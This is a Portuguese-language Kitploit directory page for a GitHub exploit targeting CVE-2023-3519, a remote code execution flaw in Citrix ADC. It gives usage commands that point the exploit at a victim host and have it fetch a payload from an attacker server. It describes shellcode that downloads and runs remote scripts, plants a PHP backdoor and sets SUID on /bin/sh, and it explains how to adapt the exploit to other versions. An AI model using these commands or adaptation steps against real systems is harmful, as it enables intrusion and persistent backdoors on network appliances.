Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-3519 — Exploit RCE para CVE-2023-3519 | Kitploit
Ferramentas/GitHubGitHub/bishopfox/cve-2023-3519
Análise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubbishopfox/cve-2023-3519

CVE-2023-3519

Exploit RCE para CVE-2023-3519

Ver Repositório
22843há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Citrix ADC RCE CVE-2023-3519

Este exploit usa endereços e shellcode para Citrix VPX 13.1-48.47. Para o artigo completo, clique aqui.

Uso

NASM é necessário para construir o shellcode.

root@kitploit:~
$ sudo apt install nasm

O shellcode incluído irá baixar e executar um script shell de um servidor http(s) remoto. O script recebe 3 argumentos: o host alvo, a porta alvo e a URL de um payload de script shell. Um exemplo de payload que executa id e uname -a antes de se limpar está incluído neste repositório.

root@kitploit:~
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a

A URL deve ser curta o suficiente para caber no buffer do shellcode, e você receberá um aviso se for muito longa.

Artefatos do shellcode

O shellcode criará um backdoor PHP em /var/netscaler/logon/a.php e definirá o bit SUID em /bin/sh. O payload sh incluso mostra um exemplo de limpeza automática desses artefatos. Observe também que o shellcode não fecha seus descritores de arquivo, então a exploração repetida excessiva pode resultar em exaustão de recursos.

Adaptação para outras versões

Para alvos Citrix baseados em FreeBSD, você só precisa encontrar 3 valores: o offset do ponteiro de retorno salvo, um gadget ROP jmp rsp (ou algo equivalente, como push rsp; ret;) e o endereço para pular a fim de evitar um crash. Esses parâmetros estão todos codificados perto do topo de cve-2023-3519.py. Para certas versões, você também pode precisar encontrar um quarto valor para corrigir o valor de RBP, já que o compilador gera cargas relativas a RBP em vez de usar instruções POP para restaurar registradores salvos.

Baixar ferramenta